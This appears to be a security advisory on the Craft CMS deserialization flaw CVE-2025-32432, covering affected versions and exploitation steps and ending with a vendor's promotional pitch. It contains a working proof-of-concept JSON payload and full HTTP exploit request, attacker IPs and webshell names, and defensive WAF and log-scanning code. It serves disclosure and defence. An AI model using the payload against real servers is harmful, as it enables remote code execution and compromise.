CVE-2025-32432: Deserialization in Craft CMS Allows RCE

Introduction
Identified on April 7, 2025, and officially published on April 25, 2025, in the NVD, CVE-2025-32432 presents a critical threat to organizations using Craft CMS, a widely adopted content management system. This flaw allows unauthenticated remote code execution (RCE), enabling attackers to run arbitrary commands on the server, compromising data security and system integrity. It is estimated that around 13,000 Craft CMS instances are vulnerable, with at least 300 already compromised. Patches were made available on April 10, 2025, but active exploitation has been detected since April 17, making an immediate response essential.
Affected Versions
The vulnerability affects the following versions of Craft CMS:
| Version | Affected Range |
|---|---|
| Craft CMS 3.x | 3.0.0-RC1 to 3.9.14 |
| Craft CMS 4.x | 4.0.0-RC1 to 4.14.14 |
| Craft CMS 5.x | 5.0.0-RC1 to 5.6.16 |
Technical Details
CVE-2025-32432 is an insecure deserialization vulnerability that results in remote code execution (RCE). It is related to a flaw in the Yii framework (CVE-2024-58136), fixed in version 2.0.52, but which required specific fixes in Craft CMS. The exploitation occurs at the actions/assets/generate-transform endpoint, where a malicious POST request can deserialize a manipulated PHP object, allowing the execution of arbitrary code.
Exploitation Process
To exploit the flaw, a malicious actor can follow these steps:
- Obtaining a Valid CSRF Token: Before reaching the vulnerable endpoint, the attacker needs to obtain the CSRF token required for the next request. For this, a basic request to the /index.php?p=admin/dashboard endpoint can be performed to capture the CSRF token.
- Sending the Malicious Payload: With a valid CSRF token, the attacker sends a POST request to the generate-transform endpoint with a payload that exploits deserialization. A simplified example of this payload would be:
```json
{
  "assetId": 11,
  "handle": {
    "width": 123,
    "height": 123,
    "as session": {
      "class": "craft\\behaviors\\FieldLayoutBehavior",
      "__class": "GuzzleHttp\\Psr7\\FnStream",
      "__construct()": [[]],
      "_fn_close": "phpinfo"
    }
  }
}
```
This payload causes the server to execute the phpinfo() function, demonstrating the ability to execute code. In real scenarios, attackers can use more complex payloads to install backdoors or extract data.
The full POST request would look something like this:
```http
POST /index.php?p=admin/actions/assets/generate-transform HTTP/1.1
Host: <hostname>
Accept-Encoding: gzip, deflate, br
X-CSRF-Token: <token>
Content-Type: application/json

{
  "assetId": 11,
  "handle": {
    "width": 123,
    "height": 123,
    "as session": {
      "class": "craft\\behaviors\\FieldLayoutBehavior",
      "__class": "GuzzleHttp\\Psr7\\FnStream",
      "__construct()": [[]],
      "_fn_close": "phpinfo"
    }
  }
}
```
- Advanced Exploitation: After the initial execution, attackers can upload malicious PHP files, such as filemanager.php, to maintain persistent access. This was observed in campaigns that used specific IPs, such as 172.86.113.137 and 104.161.32.11, to distribute malware.
Public Tools and Exploits
Tools that automate exploitation exist and are available in repositories such as:
- Chocapikk/CVE-2025-32432: A vulnerability checker for Craft CMS.
- Sachinart/CVE-2025-32432: A Python script that automates detection and exploitation, including system information extraction.
Additionally, a Metasploit module was published, lowering the barrier for less experienced attackers. SensePost also made a Nuclei template available for detection in versions 4.x and 5.x.
Evidence of Exploitation
Real-world exploitation was confirmed on April 17, 2025, with campaigns installing files such as filemanager.php (MD5: d8fddbd85e6af76c91bfa17118dbecc6) and others, like autoload_classmap.php and wp-22.php. SensePost identified approximately 35,000 domains hosting Craft CMS, of which 13,000 were vulnerable, mostly in the United States.
Mitigations
Official Patch
The definitive solution is to update Craft CMS to the patched versions, released on April 10, 2025.
Temporary Measures
If an immediate update is not possible, the following actions can reduce the risk:
- Firewall Blocking: Configure the firewall to block POST requests to the actions/assets/generate-transform endpoint containing the __class string in the body. This can be implemented in tools such as WAFs (Web Application Firewalls).
- Security Library: Install the Craft CMS Security Patches as a temporary solution.
- Log Monitoring: Check server logs for suspicious requests to the mentioned endpoint, especially those with __class.
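The following is an added example (not code from the advisory or from Craft CMS) that implements the two temporary measures above as defender-side checks: the WAF rule for POST requests to the generate-transform endpoint carrying `__class`, and a scanner for combined-format access logs that flags hits on that endpoint or requests for the file names reported in the observed campaigns. The log lines are constructed samples; the endpoint and file names come from the advisory.

```python
import re
from urllib.parse import unquote

# Endpoint and marker string the advisory's WAF rule keys on.
TARGET_ENDPOINT = "actions/assets/generate-transform"
MARKER = "__class"
# File names the advisory reports being dropped by observed campaigns.
DROPPED_FILES = ("filemanager.php", "autoload_classmap.php", "wp-22.php")

# Combined-format access log line (nginx/Apache style), as used by the constructed samples.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def should_block(method: str, path: str, body: str) -> bool:
    """WAF rule from the advisory: POST to the generate-transform endpoint whose body
    contains __class. The body is percent-decoded first so a form-encoded or
    URL-encoded JSON body cannot slip past a plain substring match (hardening
    assumption added here, beyond the literal rule). Bodies are only visible at a
    WAF or reverse proxy, not in a standard access log."""
    if method.upper() != "POST" or TARGET_ENDPOINT not in path:
        return False
    return MARKER in unquote(body)

def scan_access_log(lines):
    """Return (line_number, reason) for log lines worth investigating: any request to
    the vulnerable endpoint, or a request for one of the dropped file names."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        path = m.group("path")
        basename = path.rsplit("/", 1)[-1].split("?")[0]
        if TARGET_ENDPOINT in path:
            findings.append((n, "generate-transform request from %s" % m.group("ip")))
        elif basename in DROPPED_FILES:
            findings.append((n, "request for dropped file %s" % path))
    return findings

# Constructed sample log: a token fetch, the exploit request, then a webshell hit.
SAMPLE_LOG = [
    '203.0.113.5 - - [17/Apr/2025:10:01:02 +0000] "GET /index.php?p=admin/dashboard HTTP/1.1" 200 5123',
    '203.0.113.5 - - [17/Apr/2025:10:01:03 +0000] "POST /index.php?p=admin/actions/assets/generate-transform HTTP/1.1" 200 812',
    '203.0.113.5 - - [17/Apr/2025:10:01:09 +0000] "GET /filemanager.php HTTP/1.1" 200 44031',
    '198.51.100.7 - - [17/Apr/2025:10:02:00 +0000] "GET /blog/post HTTP/1.1" 200 9000',
]
```

Run `scan_access_log(SAMPLE_LOG)` to see the exploit request and the follow-up webshell fetch flagged while the ordinary traffic is ignored.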
Conclusion
The CVE-2025-32432 vulnerability is a critical threat that exposes Craft CMS systems to severe attacks, including data theft and malware installation. Its active exploitation and the availability of public tools, such as Python scripts and Metasploit modules, increase the urgency for action. Organizations should prioritize updating to the corrected versions and implement temporary mitigation measures if necessary. A rapid response to this flaw is essential to protect digital infrastructure.
If you want to test your systems' security in a practical and effective way, we invite you to host a hacking tournament at Bypassec, a platform with more than 100 ethical hackers ready to identify vulnerabilities in your environment.